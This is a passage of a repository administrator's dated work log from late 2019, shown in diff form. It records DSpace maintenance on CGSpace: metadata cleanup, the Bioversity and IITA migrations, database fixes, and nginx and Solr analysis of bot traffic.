+"Aranzales Rondón, Ericson","Ericson Aranzales Rondon: 0000-0001-7487-9909"
+"Staiger-Rivas, Simone","Simone Staiger: 0000-0002-3539-0817"
+"de Haan, Stef","Stef de Haan: 0000-0001-8690-1886"
+"Pulleman, Mirjam","Mirjam Pulleman: 0000-0001-9950-0176"
+"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
+"Tamene, Lulseged","Lulseged Tamene: 0000-0002-3806-8890"
+"Andrieu, Nadine","Nadine Andrieu: 0000-0001-9558-9302"
+"Ramírez-Villegas, Julián","Julian Ramirez-Villegas: 0000-0002-8044-583X"
+
    +
  • I tested the file on my local development machine with the following invocation:
  • +
+
$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • In my test environment this added 390 ORCID identifiers
  • +
  • I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update
  • +
  • Update the PostgreSQL JDBC driver to version 42.2.8 in our Ansible infrastructure scripts + +
  • +
  • Run system updates on DSpace Test (linode19) and reboot it
  • +
  • Start looking at IITA’s latest round of batch updates that Sisay had uploaded to DSpace Test earlier this month +
      +
    • For posterity, IITA’s original input file was 20196th.xls and Sisay uploaded it as “IITA_Sep_06” to DSpace Test
    • +
    • Sisay said he did run the csv-metadata-quality script on the records, but I assume he didn’t run the unsafe fixes or AGROVOC checks because I still see unnecessary Unicode, excessive whitespace, one invalid ISBN, missing dates, and a few invalid AGROVOC fields
    • +
    • In addition, a few records were missing authorship type
    • +
    • I deleted two invalid AGROVOC terms because they were ambiguous
    • +
    • Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine: +
        +
      • $ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id
      • +
      • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)
      • +
      +
    • +
    • I also looked through the IITA subjects to normalize some values
    • +
    +
  • +
  • Follow up with Marissa again about the CCAFS phase II project tags
  • +
  • Generate a list of the top 1500 authors on CGSpace:
  • +
+
dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
+
    +
  • Then I used csvcut to select the column of author names, strip the header and quote characters, and saved the sorted file:
  • +
+
$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/"//g' | sort > dspace/config/controlled-vocabularies/dc-contributor-author.xml
+
    +
  • After adding the XML formatting back to the file I formatted it using XML tidy:
  • +
+
$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-contributor-author.xml
+
+

2019-09-20

+
    +
  • Deploy a fresh snapshot of CGSpace’s PostgreSQL database on DSpace Test so we can get more accurate duplicate checking with the upcoming Bioversity and IITA migrations
  • +
  • Skype with Carol and Francesca to discuss the Bioversity migration to CGSpace +
      +
    • They want to do some enrichment of the metadata to add countries and regions
    • +
    • Also, they noticed that some items have a blank ISSN in the citation like “ISSN:”
    • +
    • I told them it’s probably best if we have Francesco produce a new export from Typo 3
    • +
    • But on second thought I think that I’ve already done so much work on this file as it is that I should fix what I can here and then do a new import to DSpace Test with the PDFs
    • +
    • Other corrections would be to replace “Inst.” and “Instit.” with “Institute” and remove those blank ISSNs from the citations (see the sketch below)
    • +
    • I will rename the files with multiple underscores so they match the filename column in the CSV using this command:
    • +
    +
  • +
+
$ perl-rename -n 's/_{2,3}/_/g' *.pdf
+
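
A hedged sketch of those citation cleanups (only illustrative; the actual cleanup might be done in OpenRefine instead, and the exact patterns may differ):

#!/usr/bin/env python3
# Hedged sketch of the citation cleanups mentioned above (patterns are guesses)
import re

def clean_citation(value):
    # expand abbreviated institute names: "Inst." / "Instit." -> "Institute"
    value = re.sub(r"\bInst(?:it)?\.", "Institute", value)
    # drop a blank "ISSN:" fragment that has no number after it
    value = re.sub(r"\s*ISSN:\s*$", "", value)
    return value.strip()

# a made-up example citation:
print(clean_citation("Rome (Italy): Inst. of Plant Genetics. ISSN:"))
# Rome (Italy): Institute of Plant Genetics.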
    +
  • I was preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month) +
      +
    • There are a few dozen that have completely fucked up names due to some encoding error
    • +
    • To make matters worse, when I tried to download them, some of the links in the “URL” column that Francesco included are wrong, so I had to go to the permalink and get a link that worked
    • +
    • After downloading everything I had to use Ubuntu’s version of rename to get rid of all the double and triple underscores:
    • +
    +
  • +
+
$ rename -v 's/___/_/g'  *.pdf
+$ rename -v 's/__/_/g'  *.pdf
+
    +
  • I’m still waiting to hear what Carol and Francesca want to do with the 1195.pdf.LCK file (for now I’ve removed it from the CSV, but for future reference it has the number 630 in its permalink)
  • +
  • I wrote two fairly long GREL expressions to clean up the institutional author names in the dc.contributor.author and dc.identifier.citation fields using OpenRefine +
      +
    • The first targets acronyms in parentheses like “International Livestock Research Institute (ILRI)”:
    • +
    +
  • +
+
value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,"")
+
    +
  • The second targets cities and countries after names like “International Livestock Research Institute, Kenya”:
  • +
+
value.replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,"")
+
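  • For reference, a similar check can be done outside OpenRefine on an exported CSV, for example previewing which author values would be caught using csvcut and grep (a rough sketch: the column name and file path are hypothetical, and only a handful of the acronyms are shown):

$ csvcut -c 'dc.contributor.author[en_US]' /tmp/bioversity-metadata.csv | grep -E ',? ?\((ILRI|CIAT|ICARDA|IPGRI|INIBAP)\)' | sort -u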
    +
  • I imported the 1,427 Bioversity records with bitstreams to a new collection called 2019-09-20 Bioversity Migration Test on DSpace Test (after splitting them in two batches of about 700 each):
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
+$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
+$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
+
    +
  • After that I exported the collection again and started doing some quality checks and cleanups: +
      +
    • Change all DOIs to use https://doi.org format
    • +
    • Change all bioversityinternational.org links to use https://
    • +
    • Fix ten authors with invalid names like “Orth,.” by checking the correct name in the citation
    • +
    • Fix several invalid ISBNs, but there are several more that contain incorrect ISBNs in their PDFs!
    • +
    • Fix some citations that were using “ISSN” instead of ISBN
    • +
    +
  • +
  • The next steps are: +
      +
    • Check for duplicates
    • +
    • Continue with institutional author normalization
    • +
    • Ask which collections we should map the items with types Brochure, Journal Item, and Thesis to
    • +
    +
  • +
+

2019-09-21

+
    +
  • Re-upload the IITA Sept 6 (20196th.xls) records to DSpace Test after I did the re-sync yesterday +
      +
    • Then I looked at the records again and sent some feedback about three duplicates to Bosede
    • +
    • Also I noticed that many journal articles have the journal and page information in the citation, but are missing dc.source and dc.format.extent fields
    • +
    +
  • +
  • Play with language identification using the langdetect, fasttext, polyglot, and langid libraries + +
  • +
  • I added very experimental language detection to the csv-metadata-quality module +
      +
    • It works by checking the predicted language of the dc.title field against the item’s dc.language.iso field
    • +
    • I tested it on the Bioversity migration data set and it actually helped me correct eleven language fields in their records!
    • +
    +
  • +
+
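  • The underlying check is simple: langid predicts a language code and a confidence score for a string, which the tool then compares against the item’s dc.language.iso value; it can be queried directly from the shell, for example (a quick sketch, assuming the langid Python package is installed):

$ python3 -c "import langid; print(langid.classify('Agricultural mechanization in Nigeria'))"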

2019-09-24

+
    +
  • Bosede fixed a few of the things I mentioned in her Sept 6 batch records, but there were still issues +
      +
    • I sent her a bit more feedback because when I asked her to delete a duplicate, she deleted the existing item on DSpace Test rather than the new one in the new batch file!
    • +
    • I fixed two incorrect languages after analyzing it with my beta language detection in the csv-metadata-quality tool
    • +
    +
  • +
+

2019-09-26

+
    +
  • Release version 0.3.0 of the csv-metadata-quality tool +
      +
    • This version includes the experimental validation of languages using the Python langid library
    • +
    • I also included updated pytest tests and test files that specifically test this functionality
    • +
    +
  • +
  • Give more feedback to Bosede about the IITA Sept 6 (20196th.xls) records on DSpace Test +
      +
    • I told her to delete one item that appears to be a duplicate, or to fix its citation to be correct if she thinks it is not a duplicate
    • +
    • I deleted another item that I had previously identified as a duplicate that she had fixed by incorrectly deleting the original (ugh)
    • +
    +
  • +
  • Get a list of institutions from CCAFS’s Clarisa API and try to parse it with jq, do some small cleanups and add a header in sed, and then pass it through csvcut to add line numbers:
  • +
+
$ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
+$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
+
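  • For what it’s worth, the same extraction could probably be done with jq alone instead of piping through grep and awk, something like this (a sketch, not verified against the live CLARISA response):

$ jq -r '.[].name' ~/Downloads/institutions.json | sed -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv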
    +
  • The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode
  • +
  • I could potentially use this with reconcile-csv and OpenRefine as a source to validate our institutional authors against…
  • +
+

2019-09-27

+
    +
  • Skype with Peter and Abenet about CGSpace actions +
      +
    • Peter will respond to ICARDA’s request to deposit items in to CGSpace, with a caveat that we agree on some vocabulary standards for institutions, countries, regions, etc
    • +
    • We discussed using ISO 3166 for countries, though Peter doesn’t like the formal names like “Moldova, Republic of” and “Tanzania, United Republic of” +
        +
      • The Debian iso-codes package has ISO 3166-1 with “common name”, “name”, and “official name” representations (see the jq sketch after this list), for example: +
          +
        • common_name: Tanzania
        • +
        • name: Tanzania, United Republic of
        • +
        • official_name: United Republic of Tanzania
        • +
        +
      • +
      • There are still some unfortunate ones there, though: +
          +
        • name: Korea, Democratic People’s Republic of
        • +
        • official_name: Democratic People’s Republic of Korea
        • +
        +
      • +
      • And this, which isn’t even in English… +
          +
        • name: Côte d’Ivoire
        • +
        • official_name: Republic of Côte d’Ivoire
        • +
        +
      • +
      • The other alternative is to just keep using the names we have, which are mostly compliant with AGROVOC
      • +
      +
    • +
    • Peter said that a new server for DSpace Test is fine, so I can proceed with the normal process of getting approval from Michael Victor and ICT when I have time (recommend moving from $40 to $80/month Linode, with 16GB RAM)
    • +
    • I need to ask Atmire for a quote to upgrade CGSpace to DSpace 6 with all current modules so we can see how many more credits we need
    • +
    +
  • +
  • A little bit more work on the Sept 6 IITA batch records +
      +
    • Bosede deleted the one item that I told her was a duplicate
    • +
    • I checked the AGROVOC subjects and fixed one incorrect one
    • +
    • Then I told her that I think the items are ready to go to CGSpace and asked Abenet for a final comment
    • +
    +
  • +
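  • A quick way to inspect those ISO 3166-1 name variants from the Debian iso-codes package is with jq (a sketch, assuming the JSON files are installed under /usr/share/iso-codes/json):

$ jq '."3166-1"[] | select(.alpha_2 == "TZ") | {name, official_name, common_name}' /usr/share/iso-codes/json/iso_3166-1.json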

October, 2019

2019-10-01

+
    +
  • Udana from IWMI asked me for a CSV export of their community on CGSpace +
      +
    • I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data
    • +
    • I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unnecessary Unicode” fix:
    • +
    +
  • +
+
$ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv > /tmp/iwmi-title-region-subregion-river.csv
+
    +
  • Then I replaced them in vim with :% s/\%u00a0/ /g because I couldn’t figure out the correct sed syntax to do it directly from the pipe above (see the perl sketch after this list)
  • +
  • I uploaded those to CGSpace and then re-exported the metadata
  • +
  • Now that I think about it, I shouldn’t be removing non-breaking spaces (U+00A0), I should be replacing them with normal spaces!
  • +
  • I modified the script so it replaces the non-breaking spaces instead of removing them
  • +
  • Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):
  • +
+
$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
+
+
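  • As for the non-breaking spaces above, the replacement can actually be done in the pipe with perl instead of vim, for example (a sketch):

$ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv | perl -CS -pe 's/\x{00A0}/ /g' > /tmp/iwmi-title-region-subregion-river.csv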

2019-10-03

+
    +
  • Upload the 117 IITA records that we had been working on last month (aka 20196th.xls aka Sept 6) to CGSpace
  • +
+

2019-10-04

+
    +
  • Create an account for Bioversity’s ICT consultant Francesco on DSpace Test:
  • +
+
$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
+
    +
  • Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21 +
      +
    • I suggested that if they still want to do value addition of those records (like adding countries, regions, etc) that they could maybe do it after we migrate the records to CGSpace
    • +
    • Carol responded to tell me where to map the items with type Brochure, Journal Item, and Thesis, so I applied them to the collection on DSpace Test
    • +
    +
  • +
+

2019-10-06

+
    +
  • Hector from CCAFS responded about my feedback of their CLARISA API +
      +
    • He made some fixes to the metadata values they are using based on my feedback and said they are happy if we would use it
    • +
    +
  • +
  • Gabriela from CIP asked me if it was possible to generate an RSS feed of items that have the CIP subject “POTATO AGRI-FOOD SYSTEMS” +
      +
    • I notice that there is a similar term “SWEETPOTATO AGRI-FOOD SYSTEMS” so I had to come up with a way to exclude that using the boolean “AND NOT” in the OpenSearch query
    • +
    • Again, the sort_by=3 parameter is the accession date, as configured in dspace.cfg
    • +
    +
  • +
+
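  • A minimal sketch of what such an OpenSearch request might look like with httpie (the exact query syntax and field handling are assumptions, not verified against CGSpace):

$ http 'https://cgspace.cgiar.org/open-search/discover' query=='"POTATO AGRI-FOOD SYSTEMS" AND NOT "SWEETPOTATO AGRI-FOOD SYSTEMS"' format==rss sort_by==3 order==desc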

2019-10-08

+
    +
  • Fix 108 more issues with authors in the ongoing Bioversity migration on DSpace Test, for example: +
      +
    • Europeanooperative Programme for Plant Genetic Resources
    • +
    • Bioversity International. Capacity Development Unit
    • +
    • W.M. van der Heide, W.M., Tripp, R.
    • +
    • Internationallant Genetic Resources Institute
    • +
    +
  • +
  • Start looking at duplicates in the Bioversity migration data on DSpace Test +
      +
    • I’m keeping track of the originals and duplicates in a Google Docs spreadsheet that I will share with Bioversity
    • +
    +
  • +
+

2019-10-09

+
    +
  • Continue working on identifying duplicates in the Bioversity migration +
      +
    • I have been recording the originals and duplicates in a spreadsheet so I can map them later
    • +
    • For now I am just reconciling any incorrect or missing metadata in the original items on CGSpace, deleting the duplicate from DSpace Test, and mapping the original to the correct place on CGSpace
    • +
    • So far I have deleted thirty duplicates and mapped fourteen
    • +
    +
  • +
  • Run all system updates on DSpace Test (linode19) and reboot the server
  • +
+

2019-10-10

+
    +
  • Felix Shaw from Earlham emailed me to ask about his admin account on DSpace Test +
      +
    • His old one got lost when I re-sync’d DSpace Test with CGSpace a few weeks ago
    • +
    • I added a new account for him and added it to the Administrators group:
    • +
    +
  • +
+
$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
+

2019-10-11

+
    +
  • I ran the DSpace cleanup function on CGSpace and it found some errors:
  • +
+
$ dspace cleanup -v
+...
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(171221) is still referenced from table "bundle".
+
    +
  • The solution, as always, is (repeat as many times as needed):
  • +
+
# su - postgres
+$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
+UPDATE 1
+

2019-10-12

+
    +
  • More work on identifying duplicates in the Bioversity migration data on DSpace Test +
      +
    • I mapped twenty-five more items on CGSpace and deleted them from the migration test collection on DSpace Test
    • +
    • After a few hours I think I finished all the duplicates that were identified by Atmire’s Duplicate Checker module
    • +
    • According to my spreadsheet there were fifty-two in total
    • +
    +
  • +
  • I was preparing to check the affiliations on the Bioversity records when I noticed that the last list of top affiliations I generated has some anomalies +
      +
    • I made some corrections in a CSV:
    • +
    +
  • +
+
from,to
+CIAT,International Center for Tropical Agriculture
+International Centre for Tropical Agriculture,International Center for Tropical Agriculture
+International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center
+International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas
+International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center
+"Agricultural Information Resource Centre, Kenya.","Agricultural Information Resource Centre, Kenya"
+"Centre for Livestock and Agricultural Development, Cambodia","Centre for Livestock and Agriculture Development, Cambodia"
+
    +
  • Then I applied it with my fix-metadata-values.py script on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
+
    +
  • I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready +
      +
    • I would still like to perhaps (re)move institutional authors from dc.contributor.author to cg.contributor.affiliation, but I will have to run that by Francesca, Carol, and Abenet
    • +
    • I could use a custom text facet like this in OpenRefine to find authors that likely match the “Last, F.” pattern: isNotNull(value.match(/^.*, \p{Lu}\.?.*$/))
    • +
    • The \p{Lu} is a cool regex character class to make sure this works for letters with accents
    • +
    • As cool as that is, it’s actually more effective to just search for authors that have “.” in them!
    • +
    • I’ve decided to add a cg.contributor.affiliation column to 1,025 items based on the logic above where the author name is not an actual person
    • +
    +
  • +
+

2019-10-13

+
    +
  • More cleanup work on the authors in the Bioversity migration +
      +
    • Now I sent the final feedback to Francesca, Carol, and Abenet
    • +
    +
  • +
  • Peter is still seeing some authors listed with “|” in the “Top Authors” statistics for some collections +
      +
    • I looked in some of the items that are listed and the author field does not contain those invalid separators
    • +
    • I decided to try doing a full Discovery re-indexing on CGSpace (linode18):
    • +
    +
  • +
+
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    82m35.993s
+
    +
  • After the re-indexing the top authors still list the following:
  • +
+
Jagwe, J.|Ouma, E.A.|Brandes-van Dorresteijn, D.|Kawuma, Brian|Smith, J.
+
    +
  • I looked in the database to find authors that had “|” in them:
  • +
+
dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
+            text_value            | resource_id 
+----------------------------------+-------------
+ Anandajayasekeram, P.|Puskur, R. |         157
+ Morales, J.|Renner, I.           |       22779
+ Zahid, A.|Haque, M.A.            |       25492
+(3 rows)
+
    +
  • Then I found their handles and corrected them, for example:
  • +
+
dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
+  handle   
+-----------
+ 10568/129
+(1 row)
+
    +
  • So I’m still not sure where these weird authors in the “Top Author” stats are coming from
  • +
+

2019-10-14

+
    +
  • I talked to Peter about the Bioversity items and he said that we should add the institutional authors back to dc.contributor.author, because I had moved them to cg.contributor.affiliation +
      +
    • Otherwise he said the data looks good
    • +
    +
  • +
+

2019-10-15

+
    +
  • I did a test export / import of the Bioversity migration items on DSpace Test +
      +
    • First export them:
    • +
    +
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
+$ mkdir 2019-10-15-Bioversity
+$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
+$ sed -i '/<dcvalue element="identifier" qualifier="uri">/d' 2019-10-15-Bioversity/*/dublin_core.xml
+
    +
  • It’s really stupid, but for some reason the handles are included even though I specified the -m option, so after the export I removed the dc.identifier.uri metadata values from the items
  • +
  • Then I imported a test subset of them in my local test environment:
  • +
+
$ ~/dspace/bin/dspace import -a -c 10568/104049 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s /tmp/2019-10-15-Bioversity
+
    +
  • I had forgotten (again) that the dspace export command doesn’t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import…
  • +
  • On CGSpace I will increase the RAM of the command line Java process for good luck before import…
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
+
    +
  • After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them
  • +
+

2019-10-21

+
    +
  • Re-sync the DSpace Test database and assetstore with CGSpace
  • +
  • Run system updates on DSpace Test (linode19) and reboot it
  • +
+

2019-10-24

+
    +
  • Create a test user for Mohammad Salem to test depositing from MEL to DSpace Test, as the last one I had created in 2019-08 was cleared when we re-synchronized DSpace Test with CGSpace recently.
  • +
+

2019-10-25

+
    +
  • Give a presentation (via WebEx) about open source software at the ILRI Open Access Week +
  • +
+

2019-10-28

+
    +
  • Move the CGSpace CG Core v2 notes from a GitHub Gist to a page on this site for archive and searchability sake
  • +
  • Work on the CG Core v2 implementation testing +
      +
    • I noticed that the page title is messed up on the item view, and after over an hour of troubleshooting it I couldn’t figure out why
    • +
    • It seems to be because the dc.title → dcterms.title modifications cause the title metadata to disappear from DRI’s <pageMeta> and therefore the title is not accessible to the XSL transformation
    • +
    • Also, I noticed a few places in the Java code where dc.title is hard coded so I think this might be one of the fields that we just assume DSpace relies on internally
    • +
    • I will revert all changes to dc.title and dc.title.alternative
    • +
    • TODO: there are similar issues with the citation_author metadata element missing from DRI, so I might have to revert those changes too
    • +
    +
  • +
+

2019-10-29

+
    +
  • After more digging in the source I found out why the dcterms.title and dcterms.creator fields are not present in the DRI pageMeta… +
      +
    • The pageMeta element is constructed in dspace-xmlui/src/main/java/org/dspace/app/xmlui/wing/IncludePageMeta.java and the code does not consider any other schemas besides DC
    • +
    • I moved title and creator back to the original DC fields and then everything was working as expected in the pageMeta, so I guess we cannot use these in DCTERMS either!
    • +
    +
  • +
  • Assist Maria from Bioversity with community and collection subscriptions
  • +

November, 2019

2019-11-04

+
    +
  • Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics +
      +
    • I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+1277694
+
    +
  • So 4.6 million from XMLUI and another 1.2 million from API requests
  • +
  • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
  • +
+
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
+106781
+
    +
  • The types of requests in the access logs are as follows (lazily extracted from the sixth field of the nginx log):
  • +
+
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | awk '{print $6}' | sed 's/"//' | sort | uniq -c | sort -n
+      1 PUT
+      8 PROPFIND
+    283 OPTIONS
+  30102 POST
+  46581 HEAD
+4594967 GET
+
    +
  • Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:
  • +
+
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
+365288
+
    +
  • Their user agent is one I’ve never seen before:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)
+
    +
  • Most of them seem to be to community or collection discover and browse results pages like /handle/10568/103/discover:
  • +
+
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -o -E "GET /(bitstream|discover|handle)" | sort | uniq -c
+   6566 GET /bitstream
+ 351928 GET /handle
+# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c discover
+214209
+# zcat --force /var/log/nginx/*access.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep Amazonbot | grep -E "GET /(bitstream|discover|handle)" | grep -c browse
+86874
+
    +
  • As far as I can tell, none of their requests are counted in the Solr statistics:
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&rows=0&wt=json&indent=true'
+
    +
  • Still, those requests are CPU intensive so I will add their user agent to the “badbots” rate limiting in nginx to reduce the impact on server load
  • +
  • After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:"Amazonbot/0.1"
+
    +
  • On the topic of spiders, I have been wanting to update DSpace’s default list of spiders in config/spiders/agents, perhaps by dropping a new list in from Atmire’s COUNTER-Robots project +
      +
    • First I checked for a user agent that is in COUNTER-Robots, but NOT in the current dspace/config/spiders/example list
    • +
    • Then I made some item and bitstream requests on DSpace Test using that user agent:
    • +
    +
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
+$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"iskanie"
+$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"iskanie"
+
    +
  • A bit later I checked Solr and found three requests from my IP with that user agent this month:
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&fq=dateYearMonth%3A2019-11&rows=0'
+<?xml version="1.0" encoding="UTF-8"?>
+<response>
+<lst name="responseHeader"><int name="status">0</int><int name="QTime">1</int><lst name="params"><str name="q">ip:73.178.9.24 AND userAgent:iskanie</str><str name="fq">dateYearMonth:2019-11</str><str name="rows">0</str></lst></lst><result name="response" numFound="3" start="0"></result>
+</response>
+
    +
  • Now I want to make similar requests with a user agent that is included in DSpace’s current user agent list:
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
+$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"celestial"
+$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&isAllowed=y' User-Agent:"celestial"
+
    +
  • After twenty minutes I didn’t see any requests in Solr, so I assume they did not get logged because they matched a bot list… +
      +
    • What’s strange is that the Solr spider agent configuration in dspace/config/modules/solr-statistics.cfg points to a file that doesn’t exist…
    • +
    +
  • +
+
spider.agentregex.regexfile = ${dspace.dir}/config/spiders/Bots-2013-03.txt
+
    +
  • Apparently that is part of Atmire’s CUA, despite being in a standard DSpace configuration file…
  • +
  • I tried with some other garbage user agents like “fuuuualan” and they were visible in Solr +
      +
    • Now I want to try adding “iskanie” and “fuuuualan” to the list of spider regexes in dspace/config/spiders/example and then try to use DSpace’s “mark spiders” feature to change them to “isBot:true” in Solr
    • +
    • I restarted Tomcat and ran dspace stats-util -m and it did some stuff for awhile, but I still don’t see any items in Solr with isBot:true
    • +
    • According to dspace-api/src/main/java/org/dspace/statistics/util/SpiderDetector.java the patterns for user agents are loaded from any file in the config/spiders/agents directory
    • +
    • I downloaded the COUNTER-Robots list to DSpace Test and overwrote the example file, then ran dspace stats-util -m and still there were no new items marked as being bots in Solr, so I think there is still something wrong
    • +
    • Jesus, the code in ./dspace-api/src/main/java/org/dspace/statistics/util/StatisticsClient.java says that stats-util -m marks spider requests by their IPs, not by their user agents… WTF:
    • +
    +
  • +
+
else if (line.hasOption('m'))
+{
+    SolrLogger.markRobotsByIP();
+}
+
    +
  • WTF again, there is actually a function called markRobotByUserAgent() that is never called anywhere! +
      +
    • It appears to be unimplemented…
    • +
    • I sent a message to the dspace-tech mailing list to ask if I should file an issue
    • +
    +
  • +
+

2019-11-05

+
    +
